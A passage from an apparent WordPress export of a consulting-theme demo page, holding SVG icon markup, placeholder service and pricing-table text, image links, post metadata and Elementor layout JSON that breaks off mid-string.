c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled</p>			
        			<a href="#"class="link-details"> Explore More </a>
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Audit and Assurance</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Gross Tax Planning</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Оrganizational Audit</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
			<h4>Progress Bars</h4>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h4>Pricing Tables</h4>		
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
			<h4>Flip Boxes</h4>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
			<h4>Service Boxes</h4>		
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="#">Explore More</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>624</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[elements]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[625]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8e54f4f","elType":"section","settings":{"padding":{"unit":"px","top":"85","right":"0","bottom":"90","left":"0","isLinked":false}},"elements":[{"id":"d69842b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"374421e","elType":"widget","settings":{"title":"Icon Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2ece61d","elType":"widget","settings":{"icon_boxes":[{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":1407},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"b6775b1"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":1408},"library":"svg"},"title":"Government Services","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"21732ff"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/card.svg","id":1409},"library":"svg"},"title":"Consumer Products","des":"Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"e1d2100"}],"icon_size":{"unit":"px","size":48,"sizes":[]},"align":"left","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox_grid"},{"id":"9df710a","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1178550","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2ba221f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":1407},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e256b55","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"aae9912","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":1410},"library":"svg"},"title":"Airlines & Transport","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":42,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9736423","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"740d57b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":1408},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"42a0f44","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1ed1cd4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"af68c9c","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":1413},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"9f24e04","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"db8197f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":1414},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn 